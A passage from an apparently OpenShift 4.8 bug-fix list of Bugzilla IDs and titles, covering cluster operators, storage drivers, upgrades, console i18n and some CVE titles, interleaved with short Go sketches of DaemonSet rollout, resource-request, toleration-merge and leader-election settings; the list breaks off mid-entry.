1932324 - CRIO fails to create a Pod in sandbox stage - starting container process caused: process_linux.go:472: container init caused: Running hook #0:: error running hook: exit status 255, stdout: , stderr: \"\n"
1932362 - CVE-2021-26539 sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation
1932401 - Cluster Ingress Operator degrades if external LB redirects http to https because of new "canary" route
1932453 - Update Japanese timestamp format
1932472 - Edit Form/YAML switchers cause weird collapsing/code-folding issue
1932487 - [OKD] origin-branding manifest is missing cluster profile annotations
1932502 - Setting MTU for a bond interface using Kernel arguments is not working
1932618 - Alerts during a test run should fail the test job, but were not
1932624 - ClusterMonitoringOperatorReconciliationErrors is pending at the end of an upgrade and probably should not be
1932626 - During a 4.8 GCP upgrade OLM fires an alert indicating the operator is unhealthy
1932673 - Virtual machine template provided by red hat should not be editable. The UI allows to edit and then reverse the change after it was made
1932789 - Proxy with port is unable to be validated if it overlaps with service/cluster network
1932799 - During a hive driven baremetal installation the process does not go beyond 80% in the bootstrap VM
1932805 - e2e: test OAuth API connections in the tests by that name
1932816 - No new local storage operator bundle image is built
1932834 - enforce the use of hashed access/authorize tokens
1933101 - Can not upgrade a Helm Chart that uses a library chart in the OpenShift dev console
1933102 - Canary daemonset uses default node selector
1933114 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it [Suite:openshift/conformance/parallel/minimal]
1933159 - multus DaemonSets should use maxUnavailable: 33%
1933173 - openshift-sdn/sdn DaemonSet should use maxUnavailable: 10%
1933174 - openshift-sdn/ovs DaemonSet should use maxUnavailable: 10%
1933179 - network-check-target DaemonSet should use maxUnavailable: 10%
1933180 - openshift-image-registry/node-ca DaemonSet should use maxUnavailable: 10%
1933184 - openshift-cluster-csi-drivers DaemonSets should use maxUnavailable: 10%
1933263 - user manifest with nodeport services causes bootstrap to block
1933269 - Cluster unstable replacing an unhealthy etcd member
1933284 - Samples in CRD creation are ordered arbitarly
1933414 - Machines are created with unexpected name for Ports
1933599 - bump k8s.io/apiserver to 1.20.3
1933630 - [Local Volume] Provision disk failed when disk label has unsupported value like ":"
1933664 - Getting Forbidden for image in a container template when creating a sample app
1933708 - Grafana is not displaying deployment config resources in dashboard `Default /Kubernetes / Compute Resources / Namespace (Workloads)`
1933711 - EgressDNS: Keep short lived records at most 30s
1933730 - [AI-UI-Wizard] Toggling "Use extra disks for local storage" checkbox highlights the "Next" button to move forward but grays out once clicked
1933761 - Cluster DNS service caps TTLs too low and thus evicts from its cache too aggressively
1933772 - MCD Crash Loop Backoff
1933805 - TargetDown alert fires during upgrades because of normal upgrade behavior
1933857 - Details page can throw an uncaught exception if kindObj prop is undefined
1933880 - Kuryr-Controller crashes when it's missing the status object
1934021 - High RAM usage on machine api termination node system oom
1934071 - etcd consuming high amount of memory and CPU after upgrade to 4.6.17
1934080 - Both old and new Clusterlogging CSVs stuck in Pending during upgrade
1934085 - Scheduling conformance tests failing in a single node cluster
1934107 - cluster-authentication-operator builds URL incorrectly for IPv6
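
Bugs 1933159 through 1933184 above ask that these DaemonSets tolerate more than one unavailable pod during rollouts so updates finish in bounded time on large clusters. A hedged Go sketch of the corresponding API shape using the standard k8s.io/api types; the 10% figure is taken from the bug titles:

package main

import (
	"fmt"

	appsv1 "k8s.io/api/apps/v1"
	"k8s.io/apimachinery/pkg/util/intstr"
)

func main() {
	maxUnavailable := intstr.FromString("10%")
	ds := appsv1.DaemonSet{
		Spec: appsv1.DaemonSetSpec{
			UpdateStrategy: appsv1.DaemonSetUpdateStrategy{
				Type: appsv1.RollingUpdateDaemonSetStrategyType,
				RollingUpdate: &appsv1.RollingUpdateDaemonSet{
					// Let 10% of nodes update at once instead of the
					// default of 1 node at a time.
					MaxUnavailable: &maxUnavailable,
				},
			},
		},
	}
	fmt.Println(ds.Spec.UpdateStrategy.RollingUpdate.MaxUnavailable)
}
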
1934112 - Add memory and uptime metadata to IO archive
1934113 - mcd panic when there's not enough free disk space
1934123 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP
1934163 - Thanos Querier restarting and gettin alert ThanosQueryHttpRequestQueryRangeErrorRateHigh
1934174 - rootfs too small when enabling NBDE
1934176 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3
1934177 - knative-camel-operator CreateContainerError "container_linux.go:366: starting container process caused: chdir to cwd (\"/home/nonroot\") set in config.json failed: permission denied"
1934216 - machineset-controller stuck in CrashLoopBackOff after upgrade to 4.7.0
1934229 - List page text filter has input lag
1934397 - Extend OLM operator gatherer to include Operator/ClusterServiceVersion conditions
1934400 - [ocp_4][4.6][apiserver-auth] OAuth API servers are not ready - PreconditionNotReady
1934516 - Setup different priority classes for prometheus-k8s and prometheus-user-workload pods
1934556 - OCP-Metal images
1934557 - RHCOS boot image bump for LUKS fixes
1934643 - Need BFD failover capability on ECMP routes
1934711 - openshift-ovn-kubernetes ovnkube-node DaemonSet should use maxUnavailable: 10%
1934773 - Canary client should perform canary probes explicitly over HTTPS (rather than redirect from HTTP)
1934905 - CoreDNS's "errors" plugin is not enabled for custom upstream resolvers
1935058 - Can't finish install sts clusters on aws government region
1935102 - Error: specifying a root certificates file with the insecure flag is not allowed during oc login
1935155 - IGMP/MLD packets being dropped
1935157 - [e2e][automation] environment tests broken
1935165 - OCP 4.6 Build fails when filename contains an umlaut
1935176 - Missing an indication whether the deployed setup is SNO.
1935269 - Topology operator group shows child Jobs. Not shown in details view's resources.
1935419 - Failed to scale worker using virtualmedia on Dell R640
1935528 - [AWS][Proxy] ingress reports degrade with CanaryChecksSucceeding=False in the cluster with proxy setting
1935539 - Openshift-apiserver CO unavailable during cluster upgrade from 4.6 to 4.7
1935541 - console operator panics in DefaultDeployment with nil cm
1935582 - prometheus liveness probes cause issues while replaying WAL
1935604 - high CPU usage fails ingress controller
1935667 - pipelinerun status icon rendering issue
1935706 - test: Detect when the master pool is still updating after upgrade
1935732 - Update Jenkins agent maven directory to be version agnostic [ART ocp build data]
1935814 - Pod and Node lists eventually have incorrect row heights when additional columns have long text
1935909 - New CSV using ServiceAccount named "default" stuck in Pending during upgrade
1936022 - DNS operator performs spurious updates in response to API's defaulting of daemonset's terminationGracePeriod and service's clusterIPs
1936030 - Ingress operator performs spurious updates in response to API's defaulting of NodePort service's clusterIPs field
1936223 - The IPI installer has a typo. It is missing the word "the" in "the Engine".
1936336 - Updating multus-cni builder & base images to be consistent with ART 4.8 (closed)
1936342 - kuryr-controller restarting after 3 days cluster running - pools without members
1936443 - Hive based OCP IPI baremetal installation fails to connect to API VIP port 22623
1936488 - [sig-instrumentation][Late] Alerts shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured: Prometheus query error
1936515 - sdn-controller is missing some health checks
1936534 - When creating a worker with a used mac-address stuck on registering
1936585 - configure alerts if the catalogsources are missing
1936620 - OLM checkbox descriptor renders switch instead of checkbox
1936721 - network-metrics-deamon not associated with a priorityClassName
1936771 - [aws ebs csi driver] The event for Pod consuming a readonly PVC is not clear
1936785 - Configmap gatherer doesn't include namespace name (in the archive path) in case of a configmap with binary data
1936788 - RBD RWX PVC creation with Filesystem volume mode selection is creating RWX PVC with Block volume mode instead of disabling Filesystem volume mode selection
1936798 - Authentication log gatherer shouldn't scan all the pod logs in the openshift-authentication namespace
1936801 - Support ServiceBinding 0.5.0+
1936854 - Incorrect imagestream is shown as selected in knative service container image edit flow
1936857 - e2e-ovirt-ipi-install-install is permafailing on 4.5 nightlies
1936859 - ovirt 4.4 -> 4.5 upgrade jobs are permafailing
1936867 - Periodic vsphere IPI install is broken - missing pip
1936871 - [Cinder CSI] Topology aware provisioning doesn't work when Nova and Cinder AZs are different
1936904 - Wrong output YAML when syncing groups without --confirm
1936983 - Topology view - vm details screen isntt stop loading
1937005 - when kuryr quotas are unlimited, we should not sent alerts
1937018 - FilterToolbar component does not handle 'null' value for 'rowFilters' prop
1937020 - Release new from image stream chooses incorrect ID based on status
1937077 - Blank White page on Topology
1937102 - Pod Containers Page Not Translated
1937122 - CAPBM changes to support flexible reboot modes
1937145 - [Local storage] PV provisioned by localvolumeset stays in "Released" status after the pod/pvc deleted
1937167 - [sig-arch] Managed cluster should have no crashlooping pods in core namespaces over four minutes
1937244 - [Local Storage] The model name of aws EBS doesn't be extracted well
1937299 - pod.spec.volumes.awsElasticBlockStore.partition is not respected on NVMe volumes
1937452 - cluster-network-operator CI linting fails in master branch
1937459 - Wrong Subnet retrieved for Service without Selector
1937460 - [CI] Network quota pre-flight checks are failing the installation
1937464 - openstack cloud credentials are not getting configured with correct user_domain_name across the cluster
1937466 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation
1937496 - Metrics viewer in OCP Console is missing date in a timestamp for selected datapoint
1937535 - Not all image pulls within OpenShift builds retry
1937594 - multiple pods in ContainerCreating state after migration from OpenshiftSDN to OVNKubernetes
1937627 - Bump DEFAULT_DOC_URL for 4.8
1937628 - Bump upgrade channels for 4.8
1937658 - Description for storage class encryption during storagecluster creation needs to be updated
1937666 - Mouseover on headline
1937683 - Wrong icon classification of output in buildConfig when the destination is a DockerImage
1937693 - ironic image "/" cluttered with files
1937694 - [oVirt] split ovirt providerIDReconciler logic into NodeController and ProviderIDController
1937717 - If browser default font size is 20, the layout of template screen breaks
1937722 - OCP 4.8 vuln due to BZ 1936445
1937929 - Operand page shows a 404:Not Found error for OpenShift GitOps Operator
1937941 - [RFE]fix wording for favorite templates
1937972 - Router HAProxy config file template is slow to render due to repetitive regex compilations
1938131 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go
1938321 - Cannot view PackageManifest objects in YAML on 'Home > Search' page nor 'CatalogSource details > Operators tab'
1938465 - thanos-querier should set a CPU request on the thanos-query container
1938466 - packageserver deployment sets neither CPU or memory request on the packageserver container
1938467 - The default cluster-autoscaler should get default cpu and memory requests if user omits them
1938468 - kube-scheduler-operator has a container without a CPU request
1938492 - Marketplace extract container does not request CPU or memory
1938493 - machine-api-operator declares restrictive cpu and memory limits where it should not
1938636 - Can't set the loglevel of the container: cluster-policy-controller and kube-controller-manager-recovery-controller
1938903 - Time range on dashboard page will be empty after drog and drop mouse in the graph
1938920 - ovnkube-master/ovs-node DaemonSets should use maxUnavailable: 10%
1938947 - Update blocked from 4.6 to 4.7 when using spot/preemptible instances
1938949 - [VPA] Updater failed to trigger evictions due to "vpa-admission-controller" not found
1939054 - machine healthcheck kills aws spot instance before generated
1939060 - CNO: nodes and masters are upgrading simultaneously
1939069 - Add source to vm template silently failed when no storage class is defined in the cluster
1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string
1939168 - Builds failing for OCP 3.11 since PR#25 was merged
1939226 - kube-apiserver readiness probe appears to be hitting /healthz, not /readyz
1939227 - kube-apiserver liveness probe appears to be hitting /healthz, not /livez
1939232 - CI tests using openshift/hello-world broken by Ruby Version Update
1939270 - fix co upgradeableFalse status and reason
1939294 - OLM may not delete pods with grace period zero (force delete)
1939412 - missed labels for thanos-ruler pods
1939485 - CVE-2021-20291 containers/storage: DoS via malicious image
1939547 - Include container="POD" in resource queries
1939555 - VSphereProblemDetectorControllerDegraded: context canceled during upgrade to 4.8.0
1939573 - after entering valid git repo url on add flow page, throwing warning message instead Validated
1939580 - Authentication operator is degraded during 4.8 to 4.8 upgrade and normal 4.8 e2e runs
1939606 - Attempting to put a host into maintenance mode warns about Ceph cluster health, but no storage cluster problems are apparent
1939661 - support new AWS region ap-northeast-3
1939726 - clusteroperator/network should not change condition/Degraded during normal serial test execution
1939731 - Image registry operator reports unavailable during normal serial run
1939734 - Node Fanout Causes Excessive WATCH Secret Calls, Taking Down Clusters
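
Several entries above (1938465 through 1938493, and 1940518/1940876 below) concern containers that ship without explicit CPU or memory requests. A small Go sketch of declaring requests with the standard Kubernetes types; the container name echoes bug 1938465 and the quantities are placeholders, not the values Red Hat chose:

package main

import (
	"fmt"

	corev1 "k8s.io/api/core/v1"
	"k8s.io/apimachinery/pkg/api/resource"
)

func main() {
	c := corev1.Container{
		Name:  "thanos-query",        // name taken from bug 1938465
		Image: "example.io/thanos:v1", // placeholder image
		Resources: corev1.ResourceRequirements{
			// Requests let the scheduler reserve capacity; omitting them
			// leaves the container with BestEffort/low-priority treatment.
			Requests: corev1.ResourceList{
				corev1.ResourceCPU:    resource.MustParse("10m"),
				corev1.ResourceMemory: resource.MustParse("50Mi"),
			},
		},
	}
	fmt.Printf("%s requests: %v\n", c.Name, c.Resources.Requests)
}
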
1939740 - dual stack nodes with OVN single ipv6 fails on bootstrap phase
1939752 - ovnkube-master sbdb container does not set requests on cpu or memory
1939753 - Delete HCO is stucking if there is still VM in the cluster
1939815 - Change the Warning Alert for Encrypted PVs in Create StorageClass(provisioner:RBD) page
1939853 - [DOC] Creating manifests API should not allow folder in the "file_name"
1939865 - GCP PD CSI driver does not have CSIDriver instance
1939869 - [e2e][automation] Add annotations to datavolume for HPP
1939873 - Unlimited number of characters accepted for base domain name
1939943 - `cluster-kube-apiserver-operator check-endpoints` observed a panic: runtime error: invalid memory address or nil pointer dereference
1940030 - cluster-resource-override: fix spelling mistake for run-level match expression in webhook configuration
1940057 - Openshift builds should use a wach instead of polling when checking for pod status
1940142 - 4.6->4.7 updates stick on OpenStackCinderCSIDriverOperatorCR_OpenStackCinderDriverControllerServiceController_Deploying
1940159 - [OSP] cluster destruction fails to remove router in BYON (with provider network) with Kuryr as primary network
1940206 - Selector and VolumeTableRows not i18ned
1940207 - 4.7->4.6 rollbacks stuck on prometheusrules admission webhook "no route to host"
1940314 - Failed to get type for Dashboard Kubernetes / Compute Resources / Namespace (Workloads)
1940318 - No data under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod'
1940322 - Split of dashbard is wrong, many Network parts
1940337 - rhos-ipi installer fails with not clear message when openstack tenant doesn't have flavors needed for compute machines
1940361 - [e2e][automation] Fix vm action tests with storageclass HPP
1940432 - Gather datahubs.installers.datahub.sap.com resources from SAP clusters
1940488 - After fix for CVE-2021-3344, Builds do not mount node entitlement keys
1940498 - pods may fail to add logical port due to lr-nat-del/lr-nat-add error messages
1940499 - hybrid-overlay not logging properly before exiting due to an error
1940518 - Components in bare metal components lack resource requests
1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header
1940704 - prjquota is dropped from rootflags if rootfs is reprovisioned
1940755 - [Web-console][Local Storage] LocalVolumeSet could not be created from web-console without detail error info
1940865 - Add BareMetalPlatformType into e2e upgrade service unsupported list
1940876 - Components in ovirt components lack resource requests
1940889 - Installation failures in OpenStack release jobs
1940933 - [sig-arch] Check if alerts are firing during or after upgrade success: AggregatedAPIDown on v1beta1.metrics.k8s.io
1940939 - Wrong Openshift node IP as kubelet setting VIP as node IP
1940940 - csi-snapshot-controller goes unavailable when machines are added removed to cluster
1940950 - vsphere: client/bootstrap CSR double create
1940972 - vsphere: [4.6] CSR approval delayed for unknown reason
1941000 - cinder storageclass creates persistent volumes with wrong label failure-domain.beta.kubernetes.io/zone in multi availability zones architecture on OSP 16.
1941334 - [RFE] Cluster-api-provider-ovirt should handle auto pinning policy
1941342 - Add `kata-osbuilder-generate.service` as part of the default presets
1941456 - Multiple pods stuck in ContainerCreating status with the message "failed to create container for [kubepods burstable podxxx] : dbus: connection closed by user" being seen in the journal log
1941526 - controller-manager-operator: Observed a panic: nil pointer dereference
1941592 - HAProxyDown not Firing
1941606 - [assisted operator] Assisted Installer Operator CSV related images should be digests for icsp
1941625 - Developer -> Topology - i18n misses
1941635 - Developer -> Monitoring - i18n misses
1941636 - BM worker nodes deployment with virtual media failed while trying to clean raid
1941645 - Developer -> Builds - i18n misses
1941655 - Developer -> Pipelines - i18n misses
1941667 - Developer -> Project - i18n misses
1941669 - Developer -> ConfigMaps - i18n misses
1941759 - Errored pre-flight checks should not prevent install
1941798 - Some details pages don't have internationalized ResourceKind labels
1941801 - Many filter toolbar dropdowns haven't been internationalized
1941815 - From the web console the terminal can no longer connect after using leaving and returning to the terminal view
1941859 - [assisted operator] assisted pod deploy first time in error state
1941901 - Toleration merge logic does not account for multiple entries with the same key
1941915 - No validation against template name in boot source customization
1941936 - when setting parameters in containerRuntimeConfig, it will show incorrect information on its description
1941980 - cluster-kube-descheduler operator is broken when upgraded from 4.7 to 4.8
1941990 - Pipeline metrics endpoint changed in osp-1.4
1941995 - fix backwards incompatible trigger api changes in osp1.4
1942086 - Administrator -> Home - i18n misses
1942117 - Administrator -> Workloads - i18n misses
1942125 - Administrator -> Serverless - i18n misses
1942193 - Operand creation form - broken/cutoff blue line on the Accordion component (fieldGroup)
1942207 - [vsphere] hostname are changed when upgrading from 4.6 to 4.7.x causing upgrades to fail
1942271 - Insights operator doesn't gather pod information from openshift-cluster-version
1942375 - CRI-O failing with error "reserving ctr name"
1942395 - The status is always "Updating" on dc detail page after deployment has failed.
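
Bug 1941901 above reports toleration merge logic that collapses entries sharing a key. A sketch of the underlying idea, merging on the full (Key, Operator, Value, Effect) tuple so two tolerations with the same key but different effects are both kept; this is illustrative, not the actual OpenShift code:

package main

import (
	"fmt"

	corev1 "k8s.io/api/core/v1"
)

type tolKey struct {
	Key      string
	Operator corev1.TolerationOperator
	Value    string
	Effect   corev1.TaintEffect
}

func mergeTolerations(a, b []corev1.Toleration) []corev1.Toleration {
	seen := map[tolKey]bool{}
	var out []corev1.Toleration
	for _, t := range append(append([]corev1.Toleration{}, a...), b...) {
		k := tolKey{t.Key, t.Operator, t.Value, t.Effect}
		if !seen[k] { // dedupe on the whole tuple, not just t.Key
			seen[k] = true
			out = append(out, t)
		}
	}
	return out
}

func main() {
	a := []corev1.Toleration{{Key: "node-role", Effect: corev1.TaintEffectNoSchedule}}
	b := []corev1.Toleration{{Key: "node-role", Effect: corev1.TaintEffectNoExecute}}
	fmt.Println(len(mergeTolerations(a, b))) // 2: same key, different effect
}
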
1942521 - [Assisted-4.7] [Staging][OCS] Minimum memory for selected role is failing although minimum OCP requirement satisfied
1942522 - Resolution fails to sort channel if inner entry does not satisfy predicate
1942536 - Corrupted image preventing containers from starting
1942548 - Administrator -> Networking - i18n misses
1942553 - CVE-2021-22133 go.elastic.co/apm: leaks sensitive HTTP headers during panic
1942555 - Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork
1942557 - Query is reporting "no datapoint" when label cluster="" is set but work when the label is removed or when running directly in Prometheus
1942608 - crictl cannot list the images with an error: error locating item named "manifest" for image with ID
1942614 - Administrator -> Storage - i18n misses
1942641 - Administrator -> Builds - i18n misses
1942673 - Administrator -> Pipelines - i18n misses
1942694 - Resource names with a colon do not display property in the browser window title
1942715 - Administrator -> User Management - i18n misses
1942716 - Quay Container Security operator has Medium <-> Low colors reversed
1942725 - [SCC] openshift-apiserver degraded when creating new pod after installing Stackrox which creates a less privileged SCC [4.8]
1942736 - Administrator -> Administration - i18n misses
1942749 - Install Operator form should use info icon for popovers
1942837 - [OCPv4.6] unable to deploy pod with unsafe sysctls
1942839 - Windows VMs fail to start on air-gapped environments
1942856 - Unable to assign nodes for EgressIP even if the egress-assignable label is set
1942858 - [RFE]Confusing detach volume UX
1942883 - AWS EBS CSI driver does not support partitions
1942894 - IPA error when provisioning masters due to an error from ironic.conductor - /dev/sda is busy
1942935 - must-gather improvements
1943145 - vsphere: client/bootstrap CSR double create
1943175 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies (set azure storage account TLS version default to 1.2)
1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()
1943219 - unable to install IPI PRIVATE OpenShift cluster in Azure - SSH access from the Internet should be blocked
1943224 - cannot upgrade openshift-kube-descheduler from 4.7.2 to latest
1943238 - The conditions table does not occupy 100% of the width.
1943258 - [Assisted-4.7][Staging][Advanced Networking] Cluster install fails while waiting for control plane
1943314 - [OVN SCALE] Combine Logical Flows inside Southbound DB.
1943315 - avoid workload disruption for ICSP changes
1943320 - Baremetal node loses connectivity with bonded interface and OVNKubernetes
1943329 - TLSSecurityProfile missing from KubeletConfig CRD Manifest
1943356 - Dynamic plugins surfaced in the UI should be referred to as "Console plugins"
1943539 - crio-wipe is failing to start "Failed to shutdown storage before wiping: A layer is mounted: layer is in use by a container"
1943543 - DeploymentConfig Rollback doesn't reset params correctly
1943558 - [assisted operator] Assisted Service pod unable to reach self signed local registry in disco environement
1943578 - CoreDNS caches NXDOMAIN responses for up to 900 seconds
1943614 - add bracket logging on openshift/builder calls into buildah to assist test-platform team triage
1943637 - upgrade from ocp 4.5 to 4.6 does not clear SNAT rules on ovn
1943649 - don't use hello-openshift for network-check-target
1943667 - KubeDaemonSetRolloutStuck fires during upgrades too often because it does not accurately detect progress
1943719 - storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions
1943804 - API server on AWS takes disruption between 70s and 110s after pod begins termination via external LB
1943845 - Router pods should have startup probes configured
1944121 - OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors
1944160 - CNO: nbctl daemon should log reconnection info
1944180 - OVN-Kube Master does not release election lock on shutdown
1944246 - Ironic fails to inspect and move node to "manageable' but get bmh remains in "inspecting"
1944268 - openshift-install AWS SDK is missing endpoints for the ap-northeast-3 region
1944509 - Translatable texts without context in ssh expose component
1944581 - oc project not works with cluster proxy
1944587 - VPA could not take actions based on the recommendation when min-replicas=1
1944590 - The field name "VolumeSnapshotContent" is wrong on VolumeSnapshotContent detail page
1944602 - Consistant fallures of features/project-creation.feature Cypress test in CI
1944631 - openshif authenticator should not accept non-hashed tokens
1944655 - [manila-csi-driver-operator] openstack-manila-csi-nodeplugin pods stucked with ".. still connecting to unix:///var/lib/kubelet/plugins/csi-nfsplugin/csi.sock"
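
Bug 1944180 above notes that the OVN-Kube master does not release its election lock on shutdown, leaving the next leader waiting for the lease to expire. client-go's leader election supports ReleaseOnCancel for exactly this case; the sketch below wires it up under assumed names (namespace, lease name, POD_NAME env var) and is illustrative, not the component's real code:

package main

import (
	"context"
	"os"
	"os/signal"
	"syscall"
	"time"

	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/rest"
	"k8s.io/client-go/tools/leaderelection"
	"k8s.io/client-go/tools/leaderelection/resourcelock"
)

func main() {
	cfg, err := rest.InClusterConfig()
	if err != nil {
		panic(err)
	}
	client := kubernetes.NewForConfigOrDie(cfg)

	lock, err := resourcelock.New(resourcelock.LeasesResourceLock,
		"openshift-ovn-kubernetes", "ovn-kubernetes-master", // assumed names
		client.CoreV1(), client.CoordinationV1(),
		resourcelock.ResourceLockConfig{Identity: os.Getenv("POD_NAME")})
	if err != nil {
		panic(err)
	}

	// Cancel the context on SIGTERM so RunOrDie returns and, because
	// ReleaseOnCancel is set, the Lease is released immediately.
	ctx, cancel := signal.NotifyContext(context.Background(), syscall.SIGTERM)
	defer cancel()

	leaderelection.RunOrDie(ctx, leaderelection.LeaderElectionConfig{
		Lock:            lock,
		LeaseDuration:   60 * time.Second,
		RenewDeadline:   30 * time.Second,
		RetryPeriod:     10 * time.Second,
		ReleaseOnCancel: true, // give up the lease on graceful shutdown
		Callbacks: leaderelection.LeaderCallbacks{
			OnStartedLeading: func(ctx context.Context) { /* run controllers */ },
			OnStoppedLeading: func() { os.Exit(0) },
		},
	})
}
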
1944660 - dm-multipath race condition on bare metal causing /boot partition mount failures
1944674 - Project field become to "All projects" and disabled in "Review and create virtual machine" step in devconsole
1944678 - Whereabouts IPAM CNI duplicate IP addresses assigned to pods
1944761 - field level help instances do not use common util component <FieldLevelHelp>
1944762 - Drain on worker node during an upgrade fails due to PDB set for image registry pod when only a single replica is present
1944763 - field level help instances do not use common util component <FieldLevelHelp>
1944853 - Update to nodejs >=14.15.4 for ARM
1944974 - Duplicate KubeControllerManagerDown/KubeSchedulerDown alerts
1944986 - Clarify the ContainerRuntimeConfiguration cr description on the validation
1945027 - Button 'Copy SSH Command' does not work
1945085 - Bring back API data in etcd test
1945091 - In k8s 1.21 bump Feature:IPv6DualStack tests are disabled
1945103 - 'User credentials' shows even the VM is not running
1945104 - In k8s 1.21 bump '[sig-storage] [cis-hostpath] [Testpattern: Generic Ephemeral-volume' tests are disabled
1945146 - Remove pipeline Tech preview badge for pipelines GA operator
1945236 - Bootstrap ignition shim doesn't follow proxy settings
1945261 - Operator dependency not consistently chosen from default channel
1945312 - project deletion does not reset UI project context
1945326 - console-operator: does not check route health periodically
1945387 - Image Registry deployment should have 2 replicas and hard anti-affinity rules
1945398 - 4.8 CI failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
1945431 - alerts: SystemMemoryExceedsReservation triggers too quickly
1945443 - operator-lifecycle-manager-packageserver flaps Available=False with no reason or message
1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service
1945548 - catalog resource update failed if spec.secrets set to ""
1945584 - Elasticsearch operator fails to install on 4.8 cluster on ppc64le/s390x
1945599 - Optionally set KERNEL_VERSION and RT_KERNEL_VERSION
1945630 - Pod log filename no longer in <pod-name>-<container-name>.log format
1945637 - QE- Automation- Fixing smoke test suite for pipeline-plugin
1945646 - gcp-routes.sh running as initrc_t unnecessarily
1945659 - [oVirt] remove ovirt_cafile from ovirt-credentials secret
1945677 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry
1945687 - Dockerfile needs updating to new container CI registry
1945700 - Syncing boot mode after changing device should be restricted to Supermicro
1945816 - " Ingresses " should be kept in English for Chinese
1945818 - Chinese translation issues: Operator should be the same with English `Operators`
1945849 - Unnecessary series churn when a new version of kube-state-metrics is rolled out
1945910 - [aws] support byo iam roles for instances
1945948 - SNO: pods can't reach ingress when the ingress uses a different IPv6.
1946079 - Virtual master is not getting an IP address
1946097 - [oVirt] oVirt credentials secret contains unnecessary "ovirt_cafile"
1946119 - panic parsing install-config
1946243 - No relevant error when pg limit is reached in block pools page
1946307 - [CI] [UPI] use a standardized and reliable way to install google cloud SDK in UPI image
1946320 - Incorrect error message in Deployment Attach Storage Page
1946449 - [e2e][automation] Fix cloud-init tests as UI changed
1946458 - Edit Application action overwrites Deployment envFrom values on save
1946459 - In bare metal IPv6 environment, [sig-storage] [Driver: nfs] tests are failing in CI.
1946479 - In k8s 1.21 bump BoundServiceAccountTokenVolume is disabled by default
1946497 - local-storage-diskmaker pod logs "DeviceSymlinkExists" and "not symlinking, could not get lock: <nil>"
1946506 - [on-prem] mDNS plugin no longer needed
1946513 - honor use specified system reserved with auto node sizing
1946540 - auth operator: only configure webhook authenticators for internal auth when oauth-apiserver pods are ready
1946584 - Machine-config controller fails to generate MC, when machine config pool with dashes in name presents under the cluster
1946607 - etcd readinessProbe is not reflective of actual readiness
1946705 - Fix issues with "search" capability in the Topology Quick Add component
1946751 - DAY2 Confusing event when trying to add hosts to a cluster that completed installation
1946788 - Serial tests are broken because of router
1946790 - Marketplace operator flakes Available=False OperatorStarting during updates
1946838 - Copied CSVs show up as adopted components
1946839 - [Azure] While mirroring images to private registry throwing error: invalid character '<' looking for beginning of value
1946865 - no "namespace:kube_pod_container_resource_requests_cpu_cores:sum" and "namespace:kube_pod_container_resource_requests_memory_bytes:sum" metrics
1946893 - the error messages are inconsistent in DNS status conditions if the default service IP is taken
1946922 - Ingress details page doesn't show referenced secret name and link
1946929 - the default dns operator's Progressing status is always True and cluster operator dns Progressing status is False
1947036 - "failed to create Matchbox client or connect" on e2e-metal jobs or metal clusters via cluster-bot
1947066 - machine-config-operator pod crashes when noProxy is *
1947067 - [Installer] Pick up upstream fix for installer console output
1947078 - Incorrect skipped status for conditional tasks in the pipeline run
1947080 - SNO IPv6 with 'temporary 60-day domain' option fails with IPv4 exception
1947154 - [master] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install
1947164 - Print "Successfully pushed" even if the build push fails.
1947176 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed.
1947293 - IPv6 provision addresses range larger then /64 prefix (e.g. /48)
/48)\n1947311 - When adding a new node to localvolumediscovery UI does not show pre-existing node name\u0027s\n1947360 - [vSphere csi driver operator] operator pod runs as \u201cBestEffort\u201d qosClass\n1947371 - [vSphere csi driver operator] operator doesn\u0027t create \u201ccsidriver\u201d instance\n1947402 - Single Node cluster upgrade: AWS EBS CSI driver deployment is stuck on rollout\n1947478 - discovery v1 beta1 EndpointSlice is deprecated in Kubernetes 1.21 (OCP 4.8)\n1947490 - If Clevis on a managed LUKs volume with Ignition enables, the system will fails to automatically open the LUKs volume on system boot\n1947498 - policy v1 beta1 PodDisruptionBudget is deprecated in Kubernetes 1.21 (OCP 4.8)\n1947663 - disk details are not synced in web-console\n1947665 - Internationalization values for ceph-storage-plugin should be in file named after plugin\n1947684 - MCO on SNO sometimes has rendered configs and sometimes does not\n1947712 - [OVN] Many faults and Polling interval stuck for 4 seconds every roughly 5 minutes intervals. \n1947719 - 8 APIRemovedInNextReleaseInUse info alerts display\n1947746 - Show wrong kubernetes version from kube-scheduler/kube-controller-manager operator pods\n1947756 - [azure-disk-csi-driver-operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade\n1947767 - [azure-disk-csi-driver-operator] Uses the same storage type in the sc created by it as the default sc?\n1947771 - [kube-descheduler]descheduler operator pod should not run as \u201cBestEffort\u201d qosClass\n1947774 - CSI driver operators use \"Always\" imagePullPolicy in some containers\n1947775 - [vSphere csi driver operator] doesn\u2019t use the downstream images from payload. \n1947776 - [vSphere csi driver operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade\n1947779 - [LSO] Should allow more nodes to be updated simultaneously for speeding up LSO upgrade\n1947785 - Cloud Compute: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947789 - 